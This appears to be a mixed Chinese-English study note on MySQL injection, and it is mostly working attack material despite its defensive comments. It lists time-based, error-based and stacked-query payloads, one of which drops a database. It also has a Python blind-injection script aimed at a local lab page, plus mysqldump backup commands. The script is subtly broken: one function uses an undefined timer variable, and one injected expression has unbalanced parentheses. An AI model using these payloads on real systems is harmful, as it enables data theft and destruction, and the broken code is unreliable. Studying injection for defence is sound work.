-- MySQL catalog lookups: the current schema, the tables of a named schema,
-- and a two-row sample of column metadata.
-- Least-privilege note: information_schema only lists objects the connecting
-- account holds some privilege on, so a narrowly-granted application account
-- bounds what these queries can reveal.
SELECT DATABASE();
SELECT table_name
FROM information_schema.tables
WHERE table_schema = 'mydatabase123';
SELECT
    TABLE_SCHEMA,
    TABLE_NAME,
    COLUMN_NAME
FROM information_schema.columns
LIMIT 2;
sleep(n) --睡眠n秒
substr(str,start,len) -- 截取mid()、left(str,len)
count(0) -- 统计条数
ascii(str) -- 返回字符ASCII码ord()
length() -- 长度
rand() -- 随机数 rand(0)伪随机
floor(x) -- 向下取整，返回不大于 x 的最大整数
extractValue('<a href="sss"></a><a href="2333"></a>','/a!123qwer!@#') -- xpath 解析
Boolean-Base布尔型注入
Union 联合查询注入
Time-Based 基于时间延迟注入
-- Time-based probe: the appended `and sleep(2)` makes the predicate's truth value observable
-- only through response latency, never through the returned content.
-- Defensive note: a sleep() reaching the database from a web request means user input was
-- concatenated into the SQL text; a parameterised query removes the channel, and repeated
-- requests that are ~2 s slower than the baseline are a simple detection signal.
select * from tb_goods where category='Phone-ele' and sleep(2)
Error-Based 报错型注入 floor()、updatexml()、extractvalue()
-- Error-based examples. Both XPath functions reject the malformed path and the resulting
-- error message quotes that argument, so anything spliced into the path is echoed back.
SELECT extractValue('<a href="sss"></a><a href="2333"></a>','/a~!123qwer!@#');
SELECT updatexml('<a href="sss"></a><a href="2333"></a>','/a:~12345','newValue');
-- The floor(rand(0)*2) variant: grouping on a key built from a non-deterministic value makes
-- the key repeat, and the duplicate-key error carries the concatenated user() string.
-- Defensive note: none of these disclose anything unless raw database errors reach the client;
-- return a generic error, keep the detail in server-side logs, and alert on user()/concat(
-- appearing in query logs from application accounts.
select count(*),concat((select user()),'===',floor(rand(0)*2))x from information_schema.tables group by x ;
Stacked queries 叠堆注入
-- Stacked queries: a second, unrelated statement follows the terminator and `#` comments out
-- whatever the original query had after the injection point.
-- Defensive note: this only works when the client connection is allowed to run several
-- statements per call; keep multi-statement execution disabled in the driver, and never grant
-- the application account DROP or other DDL privileges.
select * from user; drop database testdb; #
# python
import requests
import time
# Headers sent with every probe; the cookie value here is a truncated placeholder.
HEADER = {
    "Cookie": "PSE......"
}
# Local lab endpoint; each probe appends the `titile` search parameter to this string.
BASE_URL = "http://localhost:8080/sqli_15.php"
# 获取数据库长度
def get_database_name_length() -> int:
    """Time-based blind probe for the length of the current database name.

    For each candidate length i in 0..99 the request carries
    `length(database())=i and sleep(2)`; a request whose wall-clock time
    exceeds 1 s is read as "condition true" and i is recorded. The loop does
    not stop at the first hit, so the last i that exceeded the threshold wins.

    Returns:
        The last candidate length whose request took longer than 1 s, or 0 if
        none did.

    Defensive notes: the only signal is latency, so content-based checks never
    see it; up to 100 near-identical requests differing by a single numeric
    literal, each ~2 s slow, are the detection signature. The fix on the
    application side is a parameterised query for the search term.
    """
    count = 0
    for i in range(100):
        url = BASE_URL + "titile=Java' and length(database())={} and sleep(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url, headers=HEADER )
        # Elapsed time around the request is the oracle: > 1 s means the injected predicate held.
        if time.time() - start_time > 1:
            print("长度:{}".format(i) )
            count = i
    return count
# 获取数据库名称
def get_database_name(count):
    """Time-based blind probe that recovers the database name one character at a time.

    Args:
        count: Number of character positions to probe; positions 0..count are
            tried (`range(count+1)`).

    For each position i and each code j in 33..126, a request is sent whose
    injected predicate compares the ASCII code of one character of
    `database()` with j and calls sleep(2); when the elapsed-time check
    `time.time() - start_time > 1` passes, chr(j) is printed and appended to
    `data`. The collected characters are printed as a list and as a joined
    string; nothing is returned.

    Defensive note: this is up to 94 requests per character position, all to
    the same path with only two numeric literals changing, so rate limiting
    and burst/pattern alerting on the search endpoint catch it, and a
    parameterised query removes it entirely.
    """
    data = []
    for i in range(count+1):
        for j in range(33, 127):
            url = BASE_URL + "titile=Java' and ascii(substr(database(),{},1)={} and sleep(2) -- &action=search".format(i, j)
            requests.get(url, headers=HEADER )
            # Latency oracle: a slow response is read as "this character matches".
            if time.time() - start_time > 1:
                print( chr(j) )
                data.append( chr(j) )
    print(data)
    print(''.join(data))
# MAIN入口
# Entry point: probe the name length first, then feed it to the per-character probe.
if __name__ == '__main__':
    get_database_name(get_database_name_length())
mysql备份表testdb.products
# Dump the single table testdb.products to /tmp/aaa.sql; a bare -p prompts for the password
# instead of exposing it on the command line / in process listings.
# Security note: /tmp is world-readable on most systems and the file holds the table's full
# contents — set a restrictive umask (e.g. `umask 077`) first or write to a directory only the
# DBA can read, and prefer a dedicated backup account over root.
mysqldump -uroot -p testdb products > /tmp/aaa.sql
全库备份
# Full-server dump: -A all databases, -R stored routines, -E events, --triggers;
# --single-transaction takes a consistent InnoDB snapshot without locking tables, and
# --master-data=2 records the binary-log position as a comment for point-in-time recovery.
# Security note: -A includes the `mysql` system schema (accounts and privileges), so
# myfull.sql is as sensitive as the server itself — restrict its permissions (it is written
# to world-readable /tmp here) and encrypt it at rest and in transit.
mysqldump -uroot -p -A -R -E --triggers --master-data=2 --single-transaction > /tmp/myfull.sql
mysql恢复表testdb.products
mysql> source /tmp/aaa.sql;
TODO... 持续更新中